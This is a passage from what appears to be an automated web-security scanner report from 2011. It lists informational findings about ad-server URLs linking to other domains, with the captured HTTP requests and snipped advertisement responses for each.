HREF="http://ad.doubleclick.net/jump/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;?"><IMG SRC="http://ad.doubleclick.net/ad/N1558.NetMining/B4616765.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;?"BORDER=0 WIDTH=300 HEIGHT=250 ALT="Click Here"></A>
...[SNIP]...

18.6. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&PG=CMS3DP&AP=1390

The response contains the following links to other domains:

http://clk.atdmt.com/MRT/go/332483788/direct;;wi.728;hi.90/01/
http://view.atdmt.com/MRT/iview/332483788/direct;;wi.728;hi.90/01?click=
http://view.atdmt.com/MRT/view/332483788/direct;;wi.728;hi.90/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=CMS3DP&AP=1390 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; SRCHHPGUSR=AS=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; MUID=E361C23374E642C998D8ABA7166A75EC; Sample=93; CC=US; expid=id=865ab549f40144759b93e2b7bb61b392&bd=2011-07-20T01:30:56.273&v=2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2415
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8809046-T20670717-C82000000000072840
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 02:07:53 GMT
Content-Length: 2415

//<![CDATA[
function getRADIds() { return{"adid":"82000000000072840","pid":"8809046","targetid":"20670717"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1932003991() {var adCode_1932003991=new Array();adCode_1932003991.push('<iframe src="http://view.atdmt.com/MRT/iview/332483788/direct;;wi.728;hi.90/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_1932003991.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_1932003991.push('document.write(\'<a href="http://clk.atdmt.com/MRT/go/332483788/direct;;wi.728;hi.90/01/" target="_blank"><img src="http://view.atdmt.com/MRT/view/332483788/direct;;wi.728;hi.90/01/"/></a>
...[SNIP]...

18.7. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=1FDD375D440B439987A467BECD35D2C6&MUID=1FDD375D440B439987A467BECD35D2C6&PG=CMSCGB&AP=1390

The response contains the following link to another domain:

http://a.ads2.msads.net/CIS/58/000/000/000/012/690.jpg

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=1FDD375D440B439987A467BECD35D2C6&MUID=1FDD375D440B439987A467BECD35D2C6&PG=CMSCGB&AP=1390 HTTP/1.1
Host: a.rad.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://code.msdn.microsoft.com/
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; CULTURE=EN-US; MSNRPSShare=1; MUID=1FDD375D440B439987A467BECD35D2C6

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 871
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8621005-T44387619-C106000000000051382
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:46:52 GMT
Content-Length: 871

//<![CDATA[
function getRADIds() { return{"adid":"106000000000051382","pid":"8621005","targetid":"44387619"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}

...[SNIP]...
<a href="http://g.msn.com/2AD00053/106000000000051382.1??PID=8621005&UIT=G&TargetID=44387619&AN=1227374600&PG=CMSCGB&ASID=6bd7671bc35e437b943975566d104a88" target="_blank"><img src="http://a.ads2.msads.net/CIS/58/000/000/000/012/690.jpg" width="728" height="90" alt="Microsoft Store: Hot Deal, Cool Stuff" border="0" /></a>
...[SNIP]...

18.8. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=3320E7738B0764152F29E55B8F07641E&MUID=3320E7738B0764152F29E55B8F07641E&PG=CMS3DK&AP=1390

The response contains the following link to another domain:

http://a.ads2.msads.net/CIS/103/000/000/000/012/748.jpg

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=3320E7738B0764152F29E55B8F07641E&MUID=3320E7738B0764152F29E55B8F07641E&PG=CMS3DK&AP=1390 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://msdn.microsoft.com/en-us/ms348103.aspx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: a.rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=66ef802b93654512ad8f2c9459d99579; mh=MSFT; CC=US; CULTURE=EN-US; Sample=37; MUID=3320E7738B0764152F29E55B8F07641E

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 869
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P6248801-T20672231-C30000000000051592
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:54:33 GMT
Content-Length: 869

//<![CDATA[
function getRADIds() { return{"adid":"30000000000051592","pid":"6248801","targetid":"20672231"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD00052/30000000000051592.1??PID=6248801&UIT=G&TargetID=20672231&AN=1664106847&PG=CMS3DK&ASID=a2a145dcb80c4362a048c0a0addc21ef" target="_blank"><img src="http://a.ads2.msads.net/CIS/103/000/000/000/012/748.jpg" width="728" height="90" alt="Microsoft Store: Hot Deal, Cool Stuff" border="0" /></a>
...[SNIP]...

18.9. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The page was loaded from a URL containing a query string:

http://a.tribalfusion.com/j.ad?site=myyearbook&adSpace=myb&tagKey=987828525&th=20001302335&tKey=undefined&size=728x90&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fgames.myyearbook.com%2F&rurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=11179796&a=1&rnd=11186943

The response contains the following link to another domain:

http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network

Request

Response

18.10. http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B4616765.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3;sz=728x90;ord=1311396554;click=http://r.turn.com/r/tpclick/id/Np0nZP-wNDnEywcAaQABAA/3c/http://vapden1.lijit.com/www/delivery/ck.php?oaparams=2__zoneid=127557__loc=http%3A%2F%2Fwww.curse.com%2F__referer=http%3A%2F%2Fc627028.r28.cf2.rackcdn.com%2Fgoogle29reddefaultsUSA728x90.html__cb=70596e55b6__maxdest=/url/;?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2624116/1538_compair_summer_728x90.jpg

Request

GET /adi/N1558.NetMining/B4616765.3;sz=728x90;ord=1311396554;click=http://r.turn.com/r/tpclick/id/Np0nZP-wNDnEywcAaQABAA/3c/http://vapden1.lijit.com/www/delivery/ck.php?oaparams=2__zoneid=127557__loc=http%3A%2F%2Fwww.curse.com%2F__referer=http%3A%2F%2Fc627028.r28.cf2.rackcdn.com%2Fgoogle29reddefaultsUSA728x90.html__cb=70596e55b6__maxdest=/url/;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=156&nm_c=225&beacon=March2011&url=http%3A%2F%2Fwww.curse.com%2F&passback&click=http://r.turn.com/r/tpclick/id/Np0nZP-wNDnEywcAaQABAA/3c/http%3A%2F%2Fvapden1.lijit.com%2Fwww%2Fdelivery%2Fck.php%3Foaparams%3D2__zoneid%3D127557__loc%3Dhttp%253A%252F%252Fwww.curse.com%252F__referer%3Dhttp%253A%252F%252Fc627028.r28.cf2.rackcdn.com%252Fgoogle29reddefaultsUSA728x90.html__cb%3D70596e55b6__maxdest%3D/url/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 825
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 04:49:15 GMT
Expires: Sat, 23 Jul 2011 04:49:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/c/116/%2a/
...[SNIP]...
tsUSA728x90.html__cb=70596e55b6__maxdest=/url/http%3a%2f%2fwww.kodakgallery.com/gallery/lp/2011/airfare/nmi.jsp%3FsourceId%3D629032695803%26cm_mmc%3Ddisplay_-_nmi_-_companionairfare25_-_071911%2B360i"><img src="http://s0.2mdn.net/viewad/2624116/1538_compair_summer_728x90.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

18.11. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B4820225

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N1558.NetMining/B4820225;sz=728x90;ord=1311271275;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2835782/KodakNAM_20_041411_728x90.jpg

Request

GET /adi/N1558.NetMining/B4820225;sz=728x90;ord=1311271275;click=http://lm.trafficmp.com/clicksense/click?t=3552737279386215001&l=908365&ad=96041&s=917259&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737279386215001%26l%3D908365%26ad%3D96041%26s%3D917259%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levq_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 745
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 21 Jul 2011 18:01:16 GMT
Expires: Thu, 21 Jul 2011 18:01:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4b/c/f1/%2a/k
...[SNIP]...
q_99*sVl_115*Byp_3443735*lps_3247**1ksbhusx5p0nk___3533310**0_3805*MEn_114**_-862839443http%3a%2f%2fstore.kodak.com/store/ekconsus/ContentTheme/pbPage.kodak-20off2/ThemeID.24475600/offerID.6066482809"><img src="http://s0.2mdn.net/viewad/2835782/KodakNAM_20_041411_728x90.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

18.12. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B4820225.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2835782/KodakNAM_20_041411_300x250.jpg

Request

GET /adi/N1558.NetMining/B4820225.2;sz=300x250;ord=1311271277;click=http://lm.trafficmp.com/clicksense/click?t=3552737354895902192&l=908365&ad=96040&s=917258&c=http://media.trafficmp.com/a/click?_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 746
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 21 Jul 2011 18:01:27 GMT
Expires: Thu, 21 Jul 2011 18:01:27 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4b/c/f0/%2a/k
...[SNIP]...
vM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443http%3a%2f%2fstore.kodak.com/store/ekconsus/ContentTheme/pbPage.kodak-20off2/ThemeID.24475600/offerID.6066482809"><img src="http://s0.2mdn.net/viewad/2835782/KodakNAM_20_041411_300x250.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

18.13. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5327.LifeScript/B5695360.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3;sz=300x250;publisher=LIF;placement=LIF_FAS_WomensHealth_Q311_300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/c%3B243592852%3B0-0%3B2%3B31210306%3B4307-300/250%3B43152111/43169898/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D2%3Btile%3D4%3B%7Esscs%3D%3f;ord=8050497?

The response contains the following link to another domain:

http://s0.2mdn.net/1843222/SF_FAS_DealsHeelsGridApr_15s_40K_040611_kz_300x250.jpg

Request

GET /adi/N5327.LifeScript/B5695360.3;sz=300x250;publisher=LIF;placement=LIF_FAS_WomensHealth_Q311_300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/c%3B243592852%3B0-0%3B2%3B31210306%3B4307-300/250%3B43152111/43169898/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D2%3Btile%3D4%3B%7Esscs%3D%3f;ord=8050497? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6111
Date: Thu, 21 Jul 2011 19:23:47 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
mp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D2%3Btile%3D4%3B%7Esscs%3D%3fhttp://style.justfab.com/dmg/CB0CFE?pid=67546858&aid=243821601&cid=41682927&publisher=LIF&placement=LIF_FAS_WomensHealth_Q311_300x250"><img src="http://s0.2mdn.net/1843222/SF_FAS_DealsHeelsGridApr_15s_40K_040611_kz_300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

18.14. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5327.LifeScript/B5695360.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3;sz=300x250;publisher=LIF;placement=LIF_FAS_WomensHealth_Q311_300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/c%3B243592852%3B0-0%3B2%3B31210306%3B4307-300/250%3B43152111/43169898/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/out_of_control_it_could_be_adhd%3Bcontentid%3Db57d2ce1%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadhd%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D2%3B%7Esscs%3D%3f;ord=8136778?

The response contains the following link to another domain:

http://s0.2mdn.net/1843222/1-SF_FAS_variety_backs_15s_022211_kz_300x250.jpg

Request

GET /adi/N5327.LifeScript/B5695360.3;sz=300x250;publisher=LIF;placement=LIF_FAS_WomensHealth_Q311_300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/c%3B243592852%3B0-0%3B2%3B31210306%3B4307-300/250%3B43152111/43169898/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/out_of_control_it_could_be_adhd%3Bcontentid%3Db57d2ce1%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadhd%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D2%3B%7Esscs%3D%3f;ord=8136778? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=707503625482983
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6069
Date: Thu, 21 Jul 2011 19:24:46 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
t_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D2%3B%7Esscs%3D%3fhttp://style.justfab.com/dmg/CB0CFE?pid=67546858&aid=243821601&cid=40850993&publisher=LIF&placement=LIF_FAS_WomensHealth_Q311_300x250"><img src="http://s0.2mdn.net/1843222/1-SF_FAS_variety_backs_15s_022211_kz_300x250.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

18.15. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5767.dsc.discoveryOX2348/B5649101.33

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/2007178717/x29/DCI/6625_CT_Tower_Package_818964130/0629_CrestProNorm6636_HlthWellFemalesSelfImprv_Tow_33_17183433.html.html/7263485738303471796b67414345734b?;pc=OAS_17183433;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/2007178717/x29/DCI/6625_CT_Tower_Package_818964130/0629_CrestProNorm6636_HlthWellFemalesSelfImprv_Tow_33_17183433.html.html/7263485738303471796b67414345734b?;ord=2007178717?

The response contains the following links to other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=921394&site=65851782&code=42853597&randnum=1138821
http://s0.2mdn.net/3232206/BAN_cphpastenormandyfirmfy1112imedia_TimereStore_160x600_FY1112_Q1_static.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5767.dsc.discoveryOX2348/B5649101.33;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/2007178717/x29/DCI/6625_CT_Tower_Package_818964130/0629_CrestProNorm6636_HlthWellFemalesSelfImprv_Tow_33_17183433.html.html/7263485738303471796b67414345734b?;pc=OAS_17183433;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/2007178717/x29/DCI/6625_CT_Tower_Package_818964130/0629_CrestProNorm6636_HlthWellFemalesSelfImprv_Tow_33_17183433.html.html/7263485738303471796b67414345734b?;ord=2007178717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6980
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:19:44 GMT
Expires: Sat, 23 Jul 2011 13:19:44 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
36_HlthWellFemalesSelfImprv_Tow_33_17183433.html.html/7263485738303471796b67414345734b?http://www.pgestore.com/Crest-Pro-Health/crest-pro-health,default,sc.html?cm_mmc=Crest-_-iMedia-_-Shelf-_-CPHGum"><img src="http://s0.2mdn.net/3232206/BAN_cphpastenormandyfirmfy1112imedia_TimereStore_160x600_FY1112_Q1_static.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a></noscript>
<SCRIPT SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=921394&site=65851782&code=42853597&randnum=1138821" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

18.16. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.10

Issue detail

The page was loaded from a URL containing a query string:

